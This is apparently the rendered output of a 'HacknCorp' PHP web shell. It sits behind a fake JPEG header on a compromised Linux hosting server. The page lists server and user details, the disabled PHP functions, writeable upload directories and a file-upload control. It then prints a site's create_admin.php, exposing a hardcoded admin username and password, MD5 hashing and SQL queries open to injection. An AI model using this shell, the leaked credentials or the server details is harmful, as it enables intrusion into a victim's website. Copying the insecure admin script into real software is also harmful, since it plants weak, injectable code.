ÿØÿàJFIF``ÿáfExifMM*‡i>ê 2êê Pêÿþ?CREATOR: gd-jpeg v1.0 (usi .
HacknCorp.id
Server : Apache
System : Linux gains.enterpriseappscloud.com 4.18.0-553.62.1.lve.el8.x86_64 #1 SMP Mon Jul 21 17:50:35 UTC 2025 x86_64
User : beyondlimi ( 2438)
PHP Version : 7.4.33
Disable Function : allow_url_include, show_source, symlink, system, passthru, exec, popen, pclose, proc_open, proc_terminate,proc_get_status, proc_close, proc_nice, allow_url_fopen, shell-exec, shell_exec, fpassthru, base64_encodem, escapeshellcmd, escapeshellarg, crack_check,crack_closedict, crack_getlastmessage, crack_opendict, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, dl, escap, phpinfo
Directory :  /home/beyondlimi/public_html/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/beyondlimi/public_html/admin/create_admin.php
<?php
// Temporary script to create admin
include 'db.php';

$username = 'beyondlimits';           // change if needed
$password = 'beyondlimits123';        // change if needed
$hashed_password = md5($password);  // use password_hash() for stronger encryption

// Check if user already exists
$check = $conn->query("SELECT * FROM admin_users WHERE username='$username'");
if ($check->num_rows > 0) {
    echo "Admin user already exists.";
} else {
    $sql = "INSERT INTO admin_users (username, password) VALUES ('$username', '$hashed_password')";
    if ($conn->query($sql)) {
        echo "✅ Admin user created successfully.<br>";
        echo "Username: <b>$username</b><br>Password: <b>$password</b>";
    } else {
        echo "❌ Error: " . $conn->error;
    }
}
?>

bypass shell hackncorp